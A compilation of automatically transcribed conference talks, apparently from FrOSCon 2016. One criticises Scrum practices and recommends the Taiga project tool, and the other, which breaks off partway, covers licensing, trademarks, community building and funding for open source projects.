can go through a pile of rubble in a landfill and find some really, really valuable things. So this is the Atari game dig in New Mexico in 2015. Atari in the early 80s dumped a bunch of game cartridges for games that didn't sell, just basically buried them in the ground. And now of course some of these cartridges are worth hundreds of dollars. So they dug those up and they got a special permit for them to dug those up. And there's several Atari 2600 cartridges of ET, the extraterrestrial, which they dug up from this landfill. So there's one thing that I personally actually think is a reasonably good thing in Scrum, even if it's not very adequately named. A product backlog, a backlog is something that's sort of akin to a traffic jam. It's an impediment to movement. So it's like it's a little weird as far as the naming is concerned, but the very idea that you have a transparent list of things that your product should at some point do and then be able to prioritize that. So you know, okay, this is what's more important than this other thing, provided that you actually take an order of priorities that ranks things that are important higher than those that are urgent. I think a product backlog is absolutely reasonable to have. Simply keeping track of all the things that you want the product eventually to do is a perfectly fine thing to do. Sprints, well, kind of useful. So here's a few things that I've already mentioned this that I think are really terrible about sprints. One, we're only planning in the current sprint. We're not looking any further. Two, we are not really worrying about anything that is further on down the road. Three, every sprint immediately follows the next sprint. So the way I do it with my development team is, number one, we have our product backlog. We have the immediate next sprint and we use typically a two-week period, sometimes a one-month period for that. And so we know when our current sprint is, when our next sprint is going to be, when our next sprint is going to be. What we do now is we put down all the items, all the user stories, the product backlog items that we want to do on our current sprint and then on future sprints. And everyone on the team understands that only the current sprint is binding, only the sprint task board for the current sprint is binding and everything else is completely tentative and is subject to change. So what does that give you? That gives you a bit of a better overview of where we're going. And we're losing this completely short-term focus and we can look out a little further. And also, and I think this is just a reality and a fact of life, it is perfectly fine in a project to have a hiatus. It's perfectly okay to have a sprint that is followed by a break. And then a couple of weeks later, you pick up the next sprint. Remember this is not scrum because in scrum you cannot do this. In scrum explicitly in every project you have sprint after sprint after sprint after sprint. So I think the concept of sprints is kind of reasonable. It's something that you can use, albeit in a very modified fashion. The next thing, story points. So in one admirable thing that scrum tends to do or tends to want to do is rather than assigning a measure of this is going to take such and such effort or worse still, this is going to take so and so many person days. Remember read up on Brooks mythical man month. In 1975 he wrote the man month is a dangerous and deceptive myth for men and months are not interchangeable. That was the exact quote in 1975. So what scrum tries to do is it tries to assign an abstract measure of complexity. Some teams tend to use the term bananas for that. So a user story is so and so many bananas or whatever you come up with. Really enough scrum doesn't really say anything about perhaps renaming your story points. Maybe that's legit actually. And so the idea is that you have sort of this abstract measure of complexity and then you figure out via your burn down like into what time that translates. So you've got so and so many bananas and you're burning so and so many bananas per sprint. And so then you get this abstract measure of complexity. Now again this in my humble opinion is something that self explanatory only works if your team is stable because only if your team stable will it eventually converge on a reasonably accurate measure of complexity across teams. And I really think this is far inferior to a different approach which is and believe me this is a complete scrum no no is to actually take your user story and break it down into tasks and my degree of granularity that I think is makes the most sense to me is the most reasonable to me is break it down into a granularity such that the tasks in your user story could at least in theory be done by a single person. So basically you have tasks in there that are that do not require splitting up anymore and then what you can do is you can have people basically estimate the complexity of those tasks separately and then you can add them up. Again like I said an agile practitioner will say no no no no is a terrible idea because what the team should do is it should take an arbitrarily complex user story and should somehow come up with a measure of complexity for the whole thing by consensus. I think that's a really really terrible idea and I think that breaking it down into individual manageable tasks and then estimating those separately and adding them up is something that simply works way better for human nature. So my personal verdict on story points and by the way you know by all means feel free to disagree with me on this one is story points are useful to an extent not a whole lot but a bit. There's one thing that's related to story points that I think is patently ludicrous and that's the idea of planning poker right. So the idea of planning poker is that when you have when the team comes together and it's expected to assess the complexity of the user story by consensus you have this concept of anchoring where whoever says any kind of value first that's what everyone else is going to be calibrated against right. So let's say for example we have a certain task which someone estimates to be 20 bananas but the first person talking says five and they say well maybe I was a little high on that if I make it double the estimate of the other person we should kind of sort of be okay and then they say 10 and in reality you find out it's more like 22 and you would have been right in the first place if it were not for this anchoring thing and so the idea is that you get this deck of cards and you put down everyone selects their estimate puts it face down and then you turn it up all at the same time. I think if you're thinking that that makes any difference you're just completely lying to yourself because eventually the discussion is going to ensue and then you have the exact same anchoring problem again which is what happens if you've got three people in this area of like so and so many story points and you've got one person who is like well below is that just the person who is more competent who knows and understands a shortcut and correctly estimates that it's actually not as complex or is it a person who is just overly optimistic right? I don't think that planning poker really adds anything to the whole thing so for me that's a clear no. So like I said there are certain things that in my humble opinion you can take out of the postulates of scrum that you can and perhaps should do but it's definitely not scrum at all by its own definition and scrum by its own definition really needs to go out the window. Now this being a technology conference of course what would I do if I wouldn't also talk about tools? So what we did in our own development team was we looked at and you know there's a bunch of agile or agileish project management tools out there. We looked at a few of those and we calibrated them against sort of the way of managing our development projects and to see how well they were suitable for that. We looked among the tools that we looked at were Asana, Trello, there's an agile mode for Jira. We found all of those lacking to be lacking in one way or another and we eventually settled on a tool which some of you may know, some of you may not. Who in here has heard of Tyga? One? Okay, I'm here for a reason. Good. So Tyga is a, defines itself as a project management framework with scrum in mind. So it doesn't say it's scrum, it just says with scrum in mind and it's a particularly useful tool. It's something that you can get as a service. It comes out of a company from Argentina and it has a handful of tools that you will find quite reasonable and useful. So for example, this is just a regular project dashboard where you basically get an overview of like the projects that you're currently a part of, the things that you're working on, whether those are tasks or issues or something else. That's reasonably useful. One thing that I particularly like about Tyga is the fact that number one, it supports GitHub login. That's always helpful. So you don't need to basically log on there. It also has very, very good GitHub integration. So for example, you can do certain things like there is, you know, you can update the status of a user story via GitHub commit message in Git. That's, those things are kind of useful. But one thing that I think is particularly neat is that you have development teams that are per project and you can bring externals in on individual development teams. So specifically if you're contracting out some of your software development, this can be very, very helpful where effectively or not your contracting, your being contracted for software development, where you can, for example, bring in your customer as a product owner if you want to use that terminology, right? Which is what we're doing, for example, here with the Cloudify course, that's for one of our customers, Gigaspaces. And we're bringing some of their team on effectively as product owners and people on the team. You also get, you know, if you like burned down charts, you do get a burned down chart. You do get a task list and so on. And of course, you also get user stories that you can then break down into tasks. You can add attachments. You can add comments and so forth. And there's something that I think is particularly cool about TIGA and that is this thing, this is relatively new to TIGA. They call it TIGA Tribe. And you can effectively define a user story and you can then contract it out if you want to. You can post it as a gig on TIGA Tribe and then you get connected to a developer who might be suited for doing that and then you can basically contract a job out on a one off basis and then hopefully actually establish a relationship with that person. So if you're a hiring manager, that may be a good way to find talent as well. And best of all, and I wouldn't be talking about TIGA if it wasn't this, it's all open source. So it's not one of those things that you can only run as a service and whatnot. You can self host this thing. It's under the FerroGPL3. All the code is up on GitHub. You can go to github.com slash TIGA.io and it's everything. It's the front end, the back end, the APIs, everything's up on GitHub and is under the AGPL license and they're also eating their own dog food. So they have their own user stories for TIGA in TIGA as public projects. So you can effectively follow their development transparency. If you do go, by the way, with the hosted version, it's currently, and I don't think they have any intention to change that, free for all public projects. So if you do the same thing that they're doing with their project, which is make everything public for everyone to see, that's for free. And only if you have private projects that people who are not on the team cannot see, those are what you pay for. Of course, unless you self host, in which case you can roll this out on your own server and it's actually pretty cool stuff and it's something that you might want to look into if this is something that interests you. Just in case you're curious, what have we used this for? What have we built with this? And you'll see that effectively we're using this for something that is pretty much straight up software development, but we're also using it for something that is more on the DevOps side of things. We run a learning management system called academy.hastexo.com. We are originally a professional services company that offered and did a lot of face-to-face in-person training on things like CEPH and OpenStack and distributed technology and so forth. And what we wanted to achieve is we wanted to do all of this in what we call spot, self-paced online training. So basically the idea that you can log on to this thing and you get your own CEPH cluster to play with and you run through a series of hands-on labs and exercises and so forth, it basically takes you from zero, effectively having blank servers to having, say, for example, a fully working OpenStack cluster or a fully working CEPH cluster and so on. If you're curious, you can certainly visit us at academy.hastexo.com to see that. So we manage that, we manage effectively the iterative development of our own learning management system platform, which by the way is based on OpenEdX, with Tyga and with this development method, development management method. We also do the same thing for a full integration of the OpenEdX learning management system stack and OpenStack. So we worked on making OpenEdX work on any OpenStack cloud, so if you're in any way interested in learning management systems and running those on private or public clouds, that's something that you might be interested in as well. And this also includes interacting with OpenStack through these on-demand lab environments, where effectively we can point our system at any OpenStack private or public cloud to fire up these arbitrarily complex distributed systems for labs as learners need them. And finally, what we had to do in order to do that is make some contributions to OpenEdX itself. OpenEdX has a plug-in system that are called OpenEdX Xblocks. We wrote a couple of those. Those are up on GitHub, their open source, their public and also the Tyga project boards for those are public as well. And we use that just the same. It's a development approach that we have been using for just under a year and a half now. It's something that we're quite happy with. Maybe it's something that you want to consider. Before I take questions, I'll be happy to share these slides. All my slide decks are normally under a Creative Commons Attribution Share Like license. So if you want to use these, modify them, whatever, you're certainly free to do so. And the slides are at github.io slash fjhaz slash frostcon 2016. Those are the ones, those are actually the sources for the slides. If you want to go to the slides directly, they're here. If you want to grab these, and those should work fine on your phone and so forth as well. Okay, with that, I thank you for now and then I'll be happy to take questions. What's your reasoning for saying that if you keep a prioritized backlog and only plan for one sprint in detail, you cannot keep a big picture in mind? So this is not so much a challenge for the development team. So if you have a smart development team, and by definition normally you do, they will have a fairly good understanding of, okay, this is what the backlog looks like, this is the priority list and so forth. But how do you communicate that to your customers and your users? If you don't care about that at all, which in my humble opinion you can only do if you have zero of them, then you don't mind that either. But I think it's very important to have at least a rough idea of this is going to land, this is going to complete or will be finished in about such and such timeframe. But again, that's just my opinion and by all means please feel free to disagree. Yes, sir? Yeah, but you have the product owner for that. If you really do scrum, your team isn't supposed to talk to your customers. That's the product owner's task. Not that I find that good. Yeah, no, I mean, yeah, fine. So of course, yes, your team isn't going to talk, but where does the product owner get their information from? The only thing that they do is basically a backlog and they're not allowed to put anything on a future sprint either. Yeah, but they can put stuff in the backlog. They're allowed to do that within scrum. Like I said, I mean the only thing that you can actually tell people is you can effectively make relative statements. Well, you can make the absolute statement of we are going to do that or we're not going to do that. You know, you could of course say, okay, no, this is completely out of scope. Don't hold your breath. This is never going to happen. And you can say, okay, so we're going to do this, but not until this other thing is done. So basically you can tell someone, well, come back after X is done so we can talk about Y, but that's about it. Well, there are releases. I have no idea if that's scrum plus already or if that's in the original scrum, but you have to do it. Either way. Okay. I saw a hand over here. No, over there. Okay, you said you don't care about the planning poker that much at all, but to say story points can be important in a way at least maybe for burned on, but it cannot, at least for me, I would say you cannot have story points without the planning poker. I think you can have story points by actually having at least a tentative breakdown into tasks. If you can't break a user story into tasks to the point that you can act, you can, you can define your task as being manageable by one person, then most probably what you're thinking about is too complex for a user story anyway. You basically have to break it down some, right? And if you are able to effectively say, all right, so here are these individual tasks and you can now effectively estimate the complexity of these individual tasks and then add them up. But who estimates? What is that? But who estimates the task in this case? The team. Ideally, ideally, if you can break it down to like a single person and you perhaps actually have a person in mind who might be the qualified expert to do this, by the way, again, this is something that in Scrum is a big no-no because in Scrum everyone's a developer, right? This by the way, that's another, it's explicitly mentioned in the Scrum guide is that within the team there is only one role that is acceptable and that role is developer and it explicitly says, semi-colon, there are no exception to this rule, period. So if you work on a team that claims to use Scrum and your business cards is anything other than developer, no Scrum. Just so you know. And so like I said, you know, what Scrum does is that like pretty much everyone's equals and no one's a specialist and of course, well, if that's what it is, then you can't reasonably get to the point of, okay, let's break this down. Let's talk to this person. He or she is the expert for exactly that thing and he or she is going to be able to tell us, okay, this is about the estimate that we can do. And of course, that person is probably not going to be quite as specialized in something else that their colleague is qualified to do. So like I said, this whole idea of, you know, let's somehow draw an estimate for a user story, complexity estimate for a user story out of thin air. For me, it just completely doesn't make sense, but perhaps that's just how my brains wired. I've never seen a team which could say what complexity of a story is. So yeah, so that's the comment was exactly what I mentioned. It's fundamentally impossible almost for a team to just basically dish out a complexity estimate along a Fibonacci series, of course, right? Because we're not doing anything else there. So I think that's a good answer. A lot of people suggest scrum is a good method for startups. But from what you've just told us, it sounds like a very terrible idea because in startups, you nearly never have a stable team. So what would be your point on this? I agree. Next question. So you agree that's a terrible idea. I really think it is a terrible idea. Yes, I think that the idea of expecting out of a team to somehow magically organize itself while it is constantly changing is ludicrous. It's an entirely unrealistic expectation. I was just curious because it's suggested so often on the internet. So scrum is the most suggested thing for startups. If the internet would have been around at about maybe 200 AD, it would be full of statements saying that the sun revolves around the earth. So the appeal to majority never really works actually. We had the gentleman in the bright green shirt up here. I've heard once that you should look at scrum as a framework of tools. You should just pick the tools you like and use them how you like and fill it in as you like and not let scrum master your process but use scrum as a tool in your process. You are perfectly free to do that within the very limited freedom that scrum allows you. So for example, you can organize your daily scrum in any way that you want. You could for example put out the rule that everyone has to stand on their chairs or something or that everyone has to come in red t-shirts but it has to be daily and it has to be 15 minutes. So yes, it is a framework but it's a relatively rigid one. I guess you could call a full body cast a framework but it doesn't allow you a lot of flexibility and a lot of movement. Because I guess the way we use scrum as a company, I guess you wouldn't call it scrum because it doesn't obey the strict rules. Okay. Don't be a scrum bag. Yes sir. So with crumb bashing that's going on here, it's like, okay, you have to stick to the rules and switch off your brain. Come on. If you, it's a set of guidelines. Use your brain and act accordingly. Right. But stick to the rules. Who does it? I've never seen this. Right. Fair enough. And what does that say about the method that explicitly said you must stick to these rules otherwise you're not doing it? I'm sorry. That's just not a method. There, I agree. Okay. All right. Thank you very much. That was, well, I'll be happy to take questions later on. Okay. Thanks for coming. That was great. Thank you. All right.
|
Anyone doing any kind of Agile development has heard of or practiced Scrum, which has become a favorite among development managers. In reality, Scrum is a scourge, not a boon, and it's time to understand that the emperor is naked.
|
10.5446/32430 (DOI)
|
So, our next presentation covers all the complex, maybe complex tasks, open source projects phase that are beyond pure code and I'm very happy to introduce Isabel for the presentation and please give a warm round of applause for her. Okay, good morning. I'm going to continue in English because I know at least one person here doesn't speak German well enough to follow the presentation. If you don't speak English, sorry. So this is going to be about open source and how it's not just about source. How am I going to tell you something about what open source is all about? I'm a software engineer at Elasticsearch. We do lots of open source. We've got Logstash, we've got Kibana, we've got Beats and Elasticsearch Core, of course, which are all Apache licensed. Apart from that, I happen to be director of Apache Software Foundation. I'm co-founder of Apache Mahoud. Would you raise your hand if you know the project? One, two, three. I want to talk to you why you know it after the presentation. Apart from that, I'm co-founder of Berlin Buswords. It's a conference on all things scalable and storage, which happens in Berlin. So if you need an excuse to make your employer pay for a trip in June, like sunny, nice, to Berlin, go to this conference. Okay. In order to wake you up, how many of you are running your own open source project? A little more than half, okay. How many of you have ever contributed? Pretty nearly everyone, okay. Speaking of contributions, anyone who wrote about an open source project in their blogs, applications, press, articles, whatever. Okay. Good. Did you ever help other users getting started with open source? Come on, I want to see your hands. I don't do this meetup trick of handing out microphones and asking questions. Okay. Nice. Nearly everyone. How many of you are using open source in your day job? Keep your hands up if you contribute to open source as part of your day job. Maybe half of everyone in the kind of sort of age. Okay. How many of you are using open source in the spare time? Yes. Nearly everyone. Good. Okay. So why should all of you care about what open source is about apart from the technology behind it? Let me tell you a story. So I convinced my mom to use Ubuntu several years ago. She remembers this user interface that they used very early on and then switched to Unity which looked completely different. So totally screwed up my mom. I would totally would. So she's not the only one. Awesome. She's also a fan of Shotwell. So after missing a few upgrade cycles, we suddenly had to go from one version to the other except database schema wasn't compatible anymore. I was really, really happy to have my husband to dig through these database entries and convert to the new schema, jumping several versions. So it was one day lost, mom is still happy. And I'm happy that I have my husband who can do that. So if you do use open source in your spare time, you definitely want to know how it works so that you can talk to the right people in order to fix your problems or that you can fix these problems yourself. If you're, if you, I've seen quite a few of you who are using open source as part of your data up. Essentially this boils down to batting your business on an external dependency. What happens if this project stops receiving, oh yes, it stops receiving any security updates? What if you need a tiny little change to the project to make it work for you but you don't have the time and skills to do that yourself? Can you motivate the project to do it or can you motivate a consultant to do that for you? And what happens to this patch after what? How does it get applied to upcoming new versions? So I would suggest that even if you're not building open source yourself but only using it, you still want to understand how these projects work if you're batting your business on it so you know what's going on. Last but not least, I've seen a few of you who have raised your hands when I asked whether you run an open source project. When you get started, coding probably is like the top most thing you want to do and you want to focus on. There are a few things to keep in mind even when you start out. The first thing that you want to think about when starting an open source project in my personal opinion is to think about what your goals are, was doing that. Do you want to build a business around that software that breaks into an existing market by changing the economics? That goal might have an influence on your decision with respect to licensing, for instance. Do you want to collaborate with others who have the same need as yourself to fix the problems that you have and that others may have so that you don't have to do all the work that may require a different community model, for instance? Or do you simply just want to build up your CV, do you want to build up your reputation and skillset that also may decide how you run your project? Essentially, it boils down to how much control do you want to exercise personally? Where is this how robust should that project be? If you would want to build a company around that project, my personal take would be that you probably want to control the direction of that project. If that at some point is supposed to be your product, you don't want to give up that control. If however this is like, I want to build that thing, but I want to collaborate with others to build something that's bigger than what I could achieve, then you would want to think about how robust that project should be, how easy it should be for people to contribute and how interesting it should be for people to contribute. Okay. Now, what factors do I think about that are not code? Let's go for the easy ones. These are just the legal ones. You want to think about copyright patents and you want to think about trademarking. Let's focus on copyright first because this is like kind of sort of trivial. This is inspired by a post that was published at canoe.org. Essentially what you want to decide first is do I care about any and all of my downstream users including those that use derivative versions of my software? In that case, you go for a copy left open source license. If you do libraries, especially if there are other libraries around that do similar stuff, go for LGTBLs that people decide to use your library. If you go for server software, there's a huge wealth of discussion around APGPL, but if you go for something like stuff that's going to be hosted somewhere anyways where users typically won't run it on their own, you want to at least take a look at the APGPL. Was there something for you? For everything else, go for GPL and you're pretty much set to go. The other option, I only want to ensure that those users get the four freedoms that use my very own project. That's the ideal case for non-copy left license. When you have something like that, if you build something that's teeny tinyish and you don't care about license enforcement anyway, go for non-copy left to begin with because if you don't enforce it, there's no real reason. If you have libraries that pushes the standard forward that's near and dear to your heart but which isn't widespread yet, go for something like non-copy, go for some non-copy left license. Again, if you want to have a project that changes established economics, non-copy left, especially like say Apache software licenses, well established among businesses. If you want to drive some competitor out of the market, my personal choice would be non-copy left, probably Apache licensed. So much for easy stuff. Software patents, sorry, I'm not going down this dragon hole. If you want to talk software patents, go out there, there's the FACIFI booth, they do great work, countering software patents asks them about what this is all about. Trademarking, why should you care about trademarking? First of all, what makes a good non-infringing project name? When you build your first open source project, you don't want the company to go after you because you're infringing their trademark. Even worse, you don't want another open source project going after you for infringing their project name. So there's a little anecdote, how many of you know the name Hadoop? Keep your hands up if you know the story behind it. The story behind it is that the child of the project's founder had a little stuffed toy elephant that was called Hadoop. The cutting once coins is intense, children are very good at coming up with non-infringing project names. So that's how Hadoop came into existence. It's also how much, like, if you're searching for an internet scale search engine, nowadays is more like a crawler, like an internet crawler, go and have a look at Nudge. Nudge used to be the first word that this project founder's child ever said. So if you have children, make a little note of all the words that they invent. Might be useful one day. Okay, now you've got a non-infringing grade name. Why should you continue to care? Well, only if you really take care of your trademark, it remains a trademark or if you register it. So you have to decide if it's okay for people to sell copies of your software on eBay without mentioning where that software actually comes from, like without attribution. It's typically not a good thing. You also need to take decisions like, is it okay for a fish pedigree of company to use a logo similar to yours? One over there that one was actually created. Okay, you have to take decisions on whether you should register your trademark or not, and you will have to find and counter trademark infringing occurrences of your name and logo. What's pretty good for that is if you have a Google alert for your project, it's good to have anyway because people are discussing your project, so it's great to have that feedback what people are using it for. It's also great for people using your trademark for conferences that you are not involved with. It's great for finding products that are using your trademark without having contacted you first. Then you need to identify whether that usage is actually infringing. So if this is a product that's sufficiently similar to your project, so that there could be confusion, it could be infringing, and then you have to actively go out and fight that infringement. From experience and see a purchase of a foundation, what's usually sufficient is to send a reasonably friendly email to the person or to the marketing department and tell them, like, this is our trademark policy, you're not following it, please fix it. This is sufficient if you do it often enough. So much for the easy legal stuff. It's just like easy rules are fine. We're going to go to the slightly messier topic of people aspects. Honestly, I don't believe in the lonely, brilliant hacker. I believe that's a lie. Every one of us who writes great software stands on the shoulders of giants, either reusing software others have built or reusing ideas of others, or even better collaborating with other people. Also great software is refined over and over, it's not like bright ones. So I believe that a project without people is a dead project. And the project was a single point of failure when it comes to contributors is pretty high risk. At Apache, we've got the saying of community over code. What's more important, there's nothing more important than to have a vital community behind your open source project because this is what keeps it alive. So what do I mean with people and what do I mean with community? One of those people that should be interesting to you are potential users of your project. Where do you find them? How do you turn them into actual users? And once converted, how do you retain them? So there's a term for that. It's called marketing. How do you do marketing? You go to social media, you tweet about it, you probably use your own hashtag, you use a separate Twitter handle for Apache Mahoud. We have the ad Apache Mahoud Twitter handle which retweets all interesting news that are related to Apache Mahoud. You search for mentions of your project to find out what people are using it for. You get involved in these discussions to find out more. Why should you do that? First of all, it's good feedback for your development. Like what are people really interested in? On the other hand, you will come into the situation where people ask you, why should I use this project? What are other people doing with it? At Apache Mahoud, we used the Haasus Vicky page which was just powered by, it was an alphabetically sorted list of people who admitted to using Apache Mahoud and sometimes they were brave enough to tell us what they were doing with it. This was extremely helpful to answer the question of which people are using your project. What can I do with it? Look at this, those are the real world use cases. There's also this one instance when I went to an Apache con in Amsterdam and heard one of Apache Solar's users talk about what they did with the project. It's typically much more believable, much more approachable. If your downstream users talk about what they do with your project, then you're selling it. If you can get some of that information on your project public, that's super nice. At some point, you may want to decide if you want to run your own conference, if your project becomes really, really successful or you may want to leverage some pre-existing one. There's a couple of things you can do without conferences. You can talk to the press. You can write press announcements and hand them out. I've made very good experiences with talking to Heizer people here in Germany. People at software and support also usually are open to receiving news that they can publish on their site. It helps if these press announcements are generally understandable, not just for the hardcore geeks of your project. What you can do as well is that over time, news magazines will come to you asking for guest articles. You can start writing them yourself. You can start reviewing books if you have the time in order to know what other people are writing about your project. If you really have lots of time left, you can write your own books or you can start writing your documentation such that it can be published as a book as well. Speaking of writing books and supporting users. Some of your downstream users will be happy reading just through the docs. Many of them won't. Quite a few will prefer going to conferences like Frostconn here, being told what's new, being told what's interesting. You will end up giving talks at conferences. More important than that, you will probably end up talking to people in the hallway. What I found helpful if to have your presentation at the beginning of a day or at the beginning of the conference even, because that means that people will come to you and ask you questions on your project because it's easier to remember me standing here than me remembering everyone in the audience. Sorry, I'm pretty good with phases, but not good enough to remember everyone. You may end up standing at a booth answering questions, so just being available. Here at Frostconn, you should check out the elastic search booths outside. We've got Philip Wilsaus who's happy to answer any questions and happy to channel all of your runs to the project and company internally. There's another booth by the Apache Software Foundation that you should check out. They've got nice stickers and they can answer all the questions about Apache. Of course, you should also check out the Free Software Foundation booths. These are just my three main favorites and there's many more outside. Okay, over time, you will have to do some kind of support. What does support look like? You will have people just beginning in your project and you want to mentor them and you want to support them, not just scare them away. There will be questions that come in over and over again and you will have answered them already instead of telling them to go to the frequently asked questions page, make this frequently asked questions page linkable and link them to the correct question. It's pretty helpful and for anyone searching for the same answer, they will find the correct and detailed answer without you having to type that up every day. One hint about that is that if your first time users and beginners are happy, they might one day turn into successful contributors. Are there any students in this room or people dealing with students? Are you aware of the Google Sum of Code internships? One, two, three. So essentially, it's a way of getting you paid to contribute to open source. People are always quite as well paid as working for an IT company in Germany, but it gives you the ability to contribute to your favorite project and get money in returns. In my opinion, it's quite a nice deal. It's only for coders. Yes, it's only for coders, unfortunately. One hint concerning beginners and concerning giving support, people may not use the communication channels that you prefer. At Apache, we've got the saying what didn't happen on the mailing list didn't happen at all, but there are people who prefer having their questions posted and answered on Stack Overflow. So it does pay to spend some time there and fetch users from where they are, especially if your goal is to grow your community. Speaking of mailing lists, when you create your project, helping out isn't just about providing code samples, it's also about answering questions. So what we did at Apache Mahoud is to give out the commit bit, like the OK to commit to subversion. Back then, now it's good. Just for people answering questions and just for people helping others grogsy project, because machine learning isn't quite that easy. So we've had a couple of people who were into the field and who knew a lot of use cases, but didn't have the time to contribute code-wise. But they made great contributions on mailing lists, answering questions, giving architectural advice, et cetera. So at some point, if you have a project of your own, you want to reward that. Speaking of mailing lists, how many of you speak one more language than just English? Pretty much everyone. So there are projects that do a great job at providing localized resources, be it mailing lists for people who are uncomfortable communicating in English or whatever the project's native language is. There are also projects doing a great job at translating documentation. Just one example, there's the Apache HTTP. They've got great documentation, not just in English, but also in German and other languages. So despite the fact that probably nobody installs the web server off by going to the download button on the Apache website, people still come back to the Apache website for the documentation, which I think is a great thing, especially if you look at some of the major big data projects, their documentation usually is lagging behind quite substantially. Okay, there may be users who are not fond of using mailing lists. There exists communication fora, in this case, discuss at elastic search, which provide good access both for people who are uncomfortable with using stuff like mailing lists and who would rather prefer to have a discoverable user interface, which also provide a site channel that gets mirror to mailing lists so that people can interact either way they want. Honestly, I'm a mailing list person, but at least for elastic search, this thing is configured well enough so that I can deal with just using the browser front end. I wasn't convinced to begin with at all. Right now, I'm a convert. Okay, now you've got potential, now you've got users and you've got potential contributors to your project, how do you turn them into contributors? One thing that I found helps is prioritization. Like one of the most common questions we got at Apache Mahout was, I want to contribute. What can I do? Like me go to the GRI issue tracker and look for something that looks like it fits your need. What's actually usually slightly more effective is to use the project yourself and fix something and scratch your own itch kind of issue, like fix something that bugs you hard enough. The second most common question you get is, when will you implement in chip feature X? What's the common answer for that? Common answer is, patches welcome. Sounds pretty deflective, pretty defensive, go away, I don't want that patch. What it truly means in the project that I've been involved with is, I'm sorry, I don't have the time, please help me. So it's really an invitation to help the project out and this is also how the project should be using it. Why shouldn't you use it as a defensive strategy? If your user actually sits down writing this patch and from the very beginning, you have no intention of merging it or using it, then this will turn into a huge mess and into a huge mass of frustration because there's a user who put lots of time in it, probably spend a lot of time cleaning it up, so better tell them upfront if you really want that, you're free to fork the project, go ahead, but this is not the direction that we want to go to. Now about inviting contributions. What I've learned the hard way at Apache Mahoud is that you should be explicit about which kind of contributions you want. This patching about is about machine learning, so what people thought we were after was just implementations of new machine learning algorithms. After a couple of years, this was the least wanted patch ever. What we wanted was cleanup, was more testing, was more documentation, was help on the mailing list, was help with public relations, was help with helping other users, etc. Was help with scaling, was help with benchmarking. At some point I sat down, writing a call to action, Mahoud needs your help, email listing everything that was not writing a new algorithm. It helps to be very explicit about what you want. It also helps to write down how a contribution actually works, like step by step. This is how you check out, this is how you communicate. This is how you build, these are the tools you need for building, and this is how you contribute your patch. I know several senior level software engineers who have no clue how to read a diff. They're great engineers, they do great architectural work, they do great coding, they still don't know how to read a diff or how to read a patch. If you want these people, and if you want to get them in, teach them and train them. What helps as well is to have an after-date issue tracker, so have real-time help requests there, to track feature discussions there, and to make it visible to others which problems are being currently worked on, or which have been decided as not being on the roadmap right now. A little anecdote to that, we ran a local Hadoop hackathon in Berlin, as a site hackathon to Berlin bus routes. We had many non-Hadoop coders here, but we also had a few core Hadoop coders. We ran a little poll. What do you want to do? Some people wanted to work on feed tracks, some people wanted to use case Y. What was by far the task that was most voted for, was to get a walkthrough, how checking the project out, building it, making a change and contributing to the project looks like, and maybe getting a glimpse of what the other side of the fence looks like, like what does it develop on the other end, due to your patch. What helped for this hackathon was that the Hadoop project had had a few issues in their task trackers that were really trivial. Like, look, here's a typo in our documentation, go fix it. Here's the little typo in our variable name, go fix it. People had some tiny change that probably didn't break anything, and they could just walk through that process to get familiar with it. It's like, if you're living in this open source world, this feels really, really natural. If you're living in a corporate world where oftentimes code reviews aren't even common practice, this can feel very, very scary even to a senior person. Having these tiny issues that can get people started is very helpful. What else? What do you do if you have someone who submitted their first patch? Here's your patch. Clock's ticking. You want to give feedback early. You want to automate as much as you can to avoid work on your side and decrease the time to first response. Hadoop does a good job with that. They've got patch checkers that checks if all the tests have been submitted, if everything is correct style-wise, so no human being has to look at that. You also want clear rules for what constitutes an acceptable patch. If you say no, it's clear why. It's not a person's issue. Of course, people spending lots of time to work a patch only to have it rejected don't make happy contributors. Don't go through these endless cycles. When you do this review, remember that people may do this on their corporate time. Contact switching takes time. Projects move on. If it takes a couple months to get this patch in, you may no longer get the feedbacks that you need. If this is an interesting patch, get the feedback and changes early on. Otherwise, you may have to do them yourselves. How can you motivate as well? You can ship chocolate. I once was offered iTunes coupons for doing a patch. I didn't accept the iTunes coupons. What was more important to me was to get this person blog about the patching amount. I was essentially writing this blog post as a guest blog post, getting more reach. What I got as well for my first contribution was lots of thank yous. I got it in the GRI issue, so I didn't have to open myself. I got it in the commit message plus the release notes. It's just a tiny little name mention. If you Google for my name plus the project, you'll still find it today. It was very helpful to have this name mentioned there in order to justify to my employer why I was doing that. Suddenly, this employer could go out bragging about how one of their employees is actually into open source, which for some being a consulting company was a big thing. You can say thank you only gets you so far. At some point, if people invest too much, you may want to think about getting some financed, getting some funded. How do you find payment? It's just foundations whose whole purpose is to funnel money from sponsors to developers. CSVC funding is for some projects. For some other projects, you can find freelance gigs for your collaborators. Was that a little warning? Open source project owners and contributors usually were multiple hats. In my case, multiple checkers. Today I'm wearing the elastic search checker, but I'm also talking about my experiences at CASF, my experiences in the wider open source ecosystem. Always be aware of what hat is on your hat. Speaking of funding, what do you need funding for? You need funding for the machines to host your infrastructures, like issue trackers or control. You can use can hosting versus self-hosted. It's pretty common to use GitHub. Remember that if your project is long-living, GitHub may not be the coolest kid in 10 years' time. It's no longer. You may think about how easy it is to move all your assets out of that can hosting. You need time to configure this infrastructure. Even if you use GitHub or even if you use an issue tracker that's hosted, you still want to configure it to meet your needs. You need machines to actually work on yourself sitting in front of you, like your laptop. You need time to do this coding work and you need time to do the non-coding work. That's why you need funding. Most likely there's different sponsors for different points on that list. Speaking of funding, you can of course fund the ASF. That's how. If you need help, talk to me after this talk and I can get you on that list. Okay. Another thing, communication. You want to communicate your vision very clearly. You can tell people what's going on. You can keep people out and stop them from spending time of what you do is actually not what they need. You can embrace people and pull them in if this is what they really need. Also tell them what your priorities are to avoid discussion about the patch. What is better depends on your definition of quality. If you work in a tiny team, one-on-one communication is great. If a team grows, it turns into mass media and doesn't scale anymore, so you want the central up. What kind of communication channels can you have? You can have meetings in person. It's a really high pan-verse. You can talk to each other, you can see each other, you can communicate, you can talk back and forth. That's the expense of the setup. They are synchronous both in time and space, so you have to ship people to one location. They are also not durable because they have to be repeated for every new human in the project. Let's go a step back. We do a video chat. It's still pretty high, but in two ways, it's the faces and a little less body language. It's still kind of pretty expensive to set up because they are still synchronous in time. Imagine having one person in Australia, one person in the US. It's going to be really, really tricky. It needs good technology. You need a good internet connection. You need a good computer. If you've got someone with internet connections bad, this is probably not an option. Also it's barely durable. Imagine having to watch all the video chats again when you join the project. You're not going to do that. You can go for an online group chat. IRC is popular, they're hipchats, they're slack, whatever. It's lower bandwidth. It's text only. It's just a little queues like your partner's typing right now. It's also cheap to set up, but it's still synchronous 